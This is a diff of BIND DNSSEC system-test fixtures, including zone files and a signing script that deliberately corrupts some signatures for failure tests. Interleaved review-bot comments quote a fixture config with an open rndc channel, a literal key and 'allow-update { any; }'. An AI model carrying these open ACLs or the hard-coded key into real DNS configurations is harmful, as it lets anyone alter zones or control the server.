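Review bot: ns2/named.conf.in opens the control channel with `allow { any; }` keyed by a literal `secret "1234abcd8765";`, and most of the signed zones carry `allow-update { any; };`, yet nothing in the file says these are fixture-only values whose exposure is limited by `listen-on { 10.53.0.2; };` and the `inet 10.53.0.2` control address. A header comment under `// NS2` would record that dependency, for example `// Test fixture: the rndc key and the open allow-update ACLs rely on this server binding only to the 10.53.0.2 test address.` As a style point, the last two zones (`hours-vs-days` and `too-many-iterations`) say `type master;` while every other zone in the file says `type primary;`; use `type primary;` in both for consistency.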
--- /dev/null +++ b/bin/tests/system/dnssec/ns2/private.secure.example.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +private2secure-nxdomain CNAME r.example. +*.wild CNAME s.example. diff --git a/bin/tests/system/dnssec/ns2/rfc2335.example.db b/bin/tests/system/dnssec/ns2/rfc2335.example.db new file mode 100644 index 0000000..78e9326 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/rfc2335.example.db 
@@ -0,0 +1,114 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; File written on Fri Apr 30 12:19:15 2004 +; dnssec_signzone version 9.2.4rc3 +rfc2335.example. 300 IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + 300 SIG SOA 1 2 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + nGPJKIzF7X/hMJbZURRz59UeEi/6HRxCn9Er + GqSnpw0Ea9Yx5Axu6sLKnF7jXlkZ6NHMCIpJ + +Lv+FDHXTs/dQg== ) + 300 NS ns.rfc2335.example. + 300 SIG NS 1 2 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + Q234AL9dJYMvxdWG33lpww6AJ3GplKp+ace7 + MUaj0oqDdkx4DtJF2XaP2xcqq7kTOObdQ8ES + vVxNThqOx7LFzg== ) + 300 KEY 256 3 1 ( + AQPZhzXIabI8y5ihWUw7F0WxN2MabnYWkOcV + Fn11NgaGSdjBSYPRMMwMCasD5N2KYPRUP83W + y8mj+ofcoW1FurcZ + ) ; key id = 47799 + 300 NXT a.rfc2335.example. NS SOA SIG KEY NXT + 300 SIG NXT 1 2 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + Y587mqNy6pBEfbsU6+weM2XRSqLwLwRT9Sl7 + oNuOK9kV3TR4R2M54m2S0MgJCXbRAwU+fF8Q + UbZkSTVe2N8Nyg== ) +a.rfc2335.example. 300 IN A 10.0.0.1 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + FnfWrcw5ire8ut25504zti5l///BdDMUAkJZ + UCLFiTW4lBGMcq1pqz64zltDZXCgJ3xUeQ2i + nRt19/ZxO6Z1KA== ) + 300 NXT b.rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + R6SpC3ndMVg4u/eZaaUsXSuMHV/hZXeaM/Op + bJLAe3KxMiOHfb6XgLy7wflAiC1xt6A9bWpy + kTc5T5gfic33kA== ) +b.rfc2335.example. 300 IN A 10.0.0.2 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. 
+ zjRsYXMGyhDI6ipDtu8YXC9XPN+3hGamzzxL + 8uPE/LPo+x19MNdbzEgWzlajAf1/mkSGr2jN + BDMVBA5NMKpwAA== ) + 300 NXT d.rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + aV87iZCYsC5Tqop827Zzb18TNqopGt0QynkR + gIF/lIHqZasNFRfaS1/nTnXdDKD8JS5IqxKb + oTJr5zswDAtCEw== ) +d.rfc2335.example. 300 IN A 10.0.0.4 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + NsKyvhUYZxTbOTBX4YwxTxevI5iGBpULKwmt + +D4l00ME4XRygOVmiqVDTT9dF1EgjDxOdfMT + hSjtCh5M1b2f6g== ) + 300 NXT ns.rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + OGqlvSDZIZdHYigh4UAFzXfPze7vcQfgj7sN + +cAeoh4BL1gpa00DqANCxowNCYluDk3ZCDwt + UHZEJa8ZjNvv4g== ) +ns.rfc2335.example. 300 IN A 10.53.0.3 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + T6ZGeUWflLTku8jO23x/TeAPeUl8t0I18FCh + qHUZaHomLQasQ2jlZQn6cLpFd2uFJkBNxZ0G + I39aG7G1bObXdA== ) + 300 NXT x.rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + l46mrf3/Ii5iRm3AiDjYeMg4ZXBgitHxXA2y + e/NhKpkxRRpCs7UQ94wT/RiSCjjK49E5FBe6 + 5bRxtWq0GI7zlg== ) +x.rfc2335.example. 300 IN CNAME a.rfc2335.example. + 300 SIG CNAME 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + L3IOluq+kboBd2gR2Mu54uJKCUzfmyHRiWKl + kfx+vuFr0I8mEHQRmJtouxNDrBzmzGp5vybK + SdabLWw0n6uQEA== ) + 300 NXT z.rfc2335.example. CNAME SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + CBKoJSkZzdpwiON7JS4yPFY5VVeBjfT19x/O + vx+5UK1JZUNKhTXWWgW1er+JlLzNf4Ot40+l + z9HUTyaeS0eWyw== ) +z.rfc2335.example. 300 IN A 10.0.0.26 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + ccqjVHnehvVwlNNd4+7n/GzGlRjj+ul0gCT3 + X3950LTccxHsOFyjNNm8v/Ho/aurSYdqXEjY + jwmjC6elwkzB7A== ) + 300 NXT rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. 
+ W42WoFyd9erysv8HjKo+CpHIH1x6+pAKwCDO + /hHnkEpQI3brewxl7cWOPYeA92Ns80Ody/ui + m2E28A5gnmWqPw== ) diff --git a/bin/tests/system/dnssec/ns2/sign.sh b/bin/tests/system/dnssec/ns2/sign.sh new file mode 100644 index 0000000..bb6c254 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/sign.sh 
@@ -0,0 +1,333 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+# Sign child zones (served by ns3).
+( cd ../ns3 && $SHELL sign.sh )
+
+echo_i "ns2/sign.sh"
+
+# Get the DS records for the "trusted." and "managed." zones.
+for subdomain in secure unsupported disabled enabled
+do
+ cp "../ns3/dsset-$subdomain.managed$TP" .
+ cp "../ns3/dsset-$subdomain.trusted$TP" .
+done
+
+# Sign the "trusted." and "managed." zones.
+zone=managed.
+infile=key.db.in
+zonefile=managed.db
+
+keyname1=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone -f KSK "$zone")
+keyname2=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone "$zone")
+
+cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile"
+
+"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1
+
+zone=trusted.
+infile=key.db.in
+zonefile=trusted.db
+
+keyname1=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone -f KSK "$zone")
+keyname2=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone "$zone")
+
+cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile"
+
+"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1
+
+# The "example." zone.
+zone=example.
+infile=example.db.in
+zonefile=example.db
+
+# Get the DS records for the "example." zone.
+for subdomain in secure badds bogus dynamic keyless nsec3 optout \
+ nsec3-unknown optout-unknown multiple rsasha256 rsasha512 \
+ kskonly update-nsec3 auto-nsec auto-nsec3 secure.below-cname \
+ ttlpatch split-dnssec split-smart expired expiring upper lower \
+ dnskey-unknown dnskey-unsupported dnskey-unsupported-2 \
+ dnskey-nsec3-unknown managed-future revkey \
+ dname-at-apex-nsec3 occluded
+do
+ cp "../ns3/dsset-$subdomain.example$TP" .
+done
+
+# Sign the "example." zone.
+keyname1=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone -f KSK "$zone")
+keyname2=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone "$zone")
+
+cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile"
+
+"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1
+
+#
+# lower/uppercase the signature bits with the exception of the last characters
+# changing the last 4 characters will lead to a bad base64 encoding.
+#
+
+zonefiletmp=$(mktemp "$zonefile.XXXXXX") || exit 1
+"$CHECKZONE" -D -q -i local "$zone" "$zonefile.signed" |
+tr -d '\r' |
+awk '
+tolower($1) == "bad-cname.example." && $4 == "RRSIG" && $5 == "CNAME" {
+ for (i = 1; i <= NF; i++ ) {
+ if (i <= 12) {
+ printf("%s ", $i);
+ continue;
+ }
+ prefix = substr($i, 1, length($i) - 4);
+ suffix = substr($i, length($i) - 4, 4);
+ if (i > 12 && tolower(prefix) != prefix)
+ printf("%s%s", tolower(prefix), suffix);
+ else if (i > 12 && toupper(prefix) != prefix)
+ printf("%s%s", toupper(prefix), suffix);
+ else
+ printf("%s%s ", prefix, suffix);
+ }
+ printf("\n");
+ next;
+}
+
+tolower($1) == "bad-dname.example." && $4 == "RRSIG" && $5 == "DNAME" {
+ for (i = 1; i <= NF; i++ ) {
+ if (i <= 12) {
+ printf("%s ", $i);
+ continue;
+ }
+ prefix = substr($i, 1, length($i) - 4);
+ suffix = substr($i, length($i) - 4, 4);
+ if (i > 12 && tolower(prefix) != prefix)
+ printf("%s%s", tolower(prefix), suffix);
+ else if (i > 12 && toupper(prefix) != prefix)
+ printf("%s%s", toupper(prefix), suffix);
+ else
+ printf("%s%s ", prefix, suffix);
+ }
+ printf("\n");
+ next;
+}
+
+{ print; }' > "$zonefiletmp" && mv "$zonefiletmp" "$zonefile.signed"
+
+#
+# signed in-addr.arpa w/ a delegation for 10.in-addr.arpa which is unsigned.
+#
+zone=in-addr.arpa.
+infile=in-addr.arpa.db.in
+zonefile=in-addr.arpa.db
+
+keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+
+cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile"
+"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1
+
+# Sign the badparam secure file
+
+zone=badparam.
+infile=badparam.db.in
+zonefile=badparam.db
+
+keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+
+cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile"
+
+"$SIGNER" -P -3 - -H 1 -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1
+
+sed -e 's/IN NSEC3 1 0 1 /IN NSEC3 1 0 10 /' "$zonefile.signed" > "$zonefile.bad"
+
+# Sign the single-nsec3 secure zone with optout
+
+zone=single-nsec3.
+infile=single-nsec3.db.in
+zonefile=single-nsec3.db
+
+keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+
+cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile"
+
+"$SIGNER" -P -3 - -A -H 1 -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1
+
+#
+# algroll has just has the old DNSKEY records removed and is waiting
+# for them to be flushed from caches. We still need to generate
+# RRSIGs for the old DNSKEY.
+#
+zone=algroll.
+infile=algroll.db.in
+zonefile=algroll.db
+
+keyold1=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone -f KSK "$zone")
+keyold2=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone "$zone")
+keynew1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+keynew2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+
+cat "$infile" "$keynew1.key" "$keynew2.key" > "$zonefile"
+
+"$SIGNER" -P -o "$zone" -k "$keyold1" -k "$keynew1" "$zonefile" "$keyold1" "$keyold2" "$keynew1" "$keynew2" > /dev/null 2>&1
+
+#
+# Make a zone big enough that it takes several seconds to generate a new
+# nsec3 chain.
+#
+zone=nsec3chain-test
+zonefile=nsec3chain-test.db
+cat > "$zonefile" << EOF
+\$TTL 10
+@ 10 SOA ns2 hostmaster 0 3600 1200 864000 1200
+@ 10 NS ns2
+@ 10 NS ns3
+ns2 10 A 10.53.0.2
+ns3 10 A 10.53.0.3
+EOF
+i=1
+while [ $i -le 300 ]; do
+ echo "host$i 10 IN NS ns.elsewhere"
+ i=$((i+1))
+done >> "$zonefile"
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+cat "$key1.key" "$key2.key" >> "$zonefile"
+"$SIGNER" -P -3 - -A -H 1 -g -o "$zone" -k "$key1" "$zonefile" "$key2" > /dev/null 2>&1
+
+zone=cds.secure
+infile=cds.secure.db.in
+zonefile=cds.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+"$DSFROMKEY" -C "$key1.key" > "$key1.cds"
+cat "$infile" "$key1.key" "$key2.key" "$key1.cds" >$zonefile
+"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1
+
+zone=cds-x.secure
+infile=cds.secure.db.in
+zonefile=cds-x.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key3=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+"$DSFROMKEY" -C "$key2.key" > "$key2.cds"
+cat "$infile" "$key1.key" "$key2.key" "$key3.key" "$key2.cds" > "$zonefile"
+"$SIGNER" -P -g -x -o "$zone" "$zonefile" > /dev/null 2>&1
+
+zone=cds-update.secure
+infile=cds-update.secure.db.in
+zonefile=cds-update.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+cat "$infile" "$key1.key" "$key2.key" > "$zonefile"
+"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1
+
+zone=cds-kskonly.secure
+infile=cds-kskonly.secure.db.in
+zonefile=cds-kskonly.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+cat "$infile" "$key1.key" "$key2.key" > "$zonefile"
+"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1
+keyfile_to_key_id "$key1" > cds-kskonly.secure.id
+
+zone=cds-auto.secure
+infile=cds-auto.secure.db.in
+zonefile=cds-auto.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+$SETTIME -P sync now "$key1" > /dev/null
+cat "$infile" > "$zonefile.signed"
+
+zone=cdnskey.secure
+infile=cdnskey.secure.db.in
+zonefile=cdnskey.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+sed 's/DNSKEY/CDNSKEY/' "$key1.key" > "$key1.cds"
+cat "$infile" "$key1.key" "$key2.key" "$key1.cds" > "$zonefile"
+"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1
+
+zone=cdnskey-x.secure
+infile=cdnskey.secure.db.in
+zonefile=cdnskey-x.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key3=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+sed 's/DNSKEY/CDNSKEY/' "$key1.key" > "$key1.cds"
+cat "$infile" "$key1.key" "$key2.key" "$key3.key" "$key1.cds" > "$zonefile"
+"$SIGNER" -P -g -x -o "$zone" "$zonefile" > /dev/null 2>&1
+
+zone=cdnskey-update.secure
+infile=cdnskey-update.secure.db.in
+zonefile=cdnskey-update.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+cat "$infile" "$key1.key" "$key2.key" > "$zonefile"
+"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1
+
+zone=cdnskey-kskonly.secure
+infile=cdnskey-kskonly.secure.db.in
+zonefile=cdnskey-kskonly.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+cat "$infile" "$key1.key" "$key2.key" > "$zonefile"
+"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1
+keyfile_to_key_id "$key1" > cdnskey-kskonly.secure.id
+
+zone=cdnskey-auto.secure
+infile=cdnskey-auto.secure.db.in
+zonefile=cdnskey-auto.secure.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+$SETTIME -P sync now "$key1" > /dev/null
+cat "$infile" > "$zonefile.signed"
+
+zone=updatecheck-kskonly.secure
+infile=template.secure.db.in
+zonefile=${zone}.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+# Save key id's for checking active key usage
+keyfile_to_key_id "$key1" > $zone.ksk.id
+keyfile_to_key_id "$key2" > $zone.zsk.id
+echo "${key1}" > $zone.ksk.key
+echo "${key2}" > $zone.zsk.key
+# Add CDS and CDNSKEY records
+sed 's/DNSKEY/CDNSKEY/' "$key1.key" > "$key1.cdnskey"
+"$DSFROMKEY" -C "$key1.key" > "$key1.cds"
+cat "$infile" "$key1.key" "$key2.key" "$key1.cdnskey" "$key1.cds" > "$zonefile"
+# Don't sign, let auto-dnssec maintain do it.
+mv $zonefile "$zonefile.signed"
+
+zone=hours-vs-days
+infile=hours-vs-days.db.in
+zonefile=hours-vs-days.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+$SETTIME -P sync now "$key1" > /dev/null
+cat "$infile" > "$zonefile.signed"
+
+#
+# Negative result from this zone should come back as insecure.
+#
+zone=too-many-iterations
+infile=too-many-iterations.db.in
+zonefile=too-many-iterations.db
+key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone")
+key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+cat "$infile" "$key1.key" "$key2.key" > "$zonefile"
+"$SIGNER" -P -3 - -H too-many -g -o "$zone" "$zonefile" > /dev/null 2>&1
diff --git a/bin/tests/system/dnssec/ns2/single-nsec3.db.in b/bin/tests/system/dnssec/ns2/single-nsec3.db.in
new file mode 100644
index 0000000..b2e3c13
--- /dev/null
+++ b/bin/tests/system/dnssec/ns2/single-nsec3.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns2.example. . (
+ 2010042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2.example.
+delegation NS ns3.example.
diff --git a/bin/tests/system/dnssec/ns2/template.secure.db.in b/bin/tests/system/dnssec/ns2/template.secure.db.in
new file mode 100644
index 0000000..aa3aaab
--- /dev/null
+++ b/bin/tests/system/dnssec/ns2/template.secure.db.in
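Review bot: In ns2/sign.sh, both awk blocks that mangle the bad-cname and bad-dname RRSIGs compute `suffix = substr($i, length($i) - 4, 4)`, which starts one character too early: awk's substr is 1-based, so the character at position length-4 is emitted in both prefix and suffix and the final character of each chunk is dropped. That contradicts the comment about leaving the last four characters alone and may alter the trailing base64 padding; `suffix = substr($i, length($i) - 3, 4);` keeps the last four intact. The same pipeline reports only awk's exit status under /bin/sh, so a failing `"$CHECKZONE"` would leave an empty temp file that the `mv` then installs as `$zonefile.signed`. Running `[ -s "$zonefiletmp" ] || exit 1` as its own command before the `mv` would surface that instead of letting a later test fail for an unrelated-looking reason.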
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns2.example. . 1 3600 1200 86400 1200
+@ NS ns2.example.
diff --git a/bin/tests/system/dnssec/ns2/too-many-iterations.db.in b/bin/tests/system/dnssec/ns2/too-many-iterations.db.in
new file mode 100644
index 0000000..1527e07
--- /dev/null
+++ b/bin/tests/system/dnssec/ns2/too-many-iterations.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 30 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 30 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
+
+a A 10.0.0.1
+*.a A 10.0.0.3
+b A 10.0.0.2
+d A 10.0.0.4
diff --git a/bin/tests/system/dnssec/ns3/auto-nsec.example.db.in b/bin/tests/system/dnssec/ns3/auto-nsec.example.db.in
new file mode 100644
index 0000000..a7792fd
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/auto-nsec.example.db.in
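Review bot: In ns2/too-many-iterations.db.in two comments contradict the values beside them: `$TTL 30 ; 5 minutes` sets 30 seconds, and the SOA field `30 ; minimum (1 hour)` also sets 30 seconds. They look carried over from the sibling zone files that use 300 and 3600. Writing `$TTL 30 ; 30 seconds` and `30 ; minimum (30 seconds)` would keep a reader from assuming a longer positive or negative caching window than this zone actually uses.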
@@ -0,0 +1,40 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
+nosoa NS ns.nosoa
+ns.nosoa A 10.53.0.7
+
+normalthenrrsig A 10.0.0.28
+rrsigonly A 10.0.0.29
diff --git a/bin/tests/system/dnssec/ns3/auto-nsec3.example.db.in b/bin/tests/system/dnssec/ns3/auto-nsec3.example.db.in
new file mode 100644
index 0000000..a7792fd
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/auto-nsec3.example.db.in
@@ -0,0 +1,40 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
+nosoa NS ns.nosoa
+ns.nosoa A 10.53.0.7
+
+normalthenrrsig A 10.0.0.28
+rrsigonly A 10.0.0.29
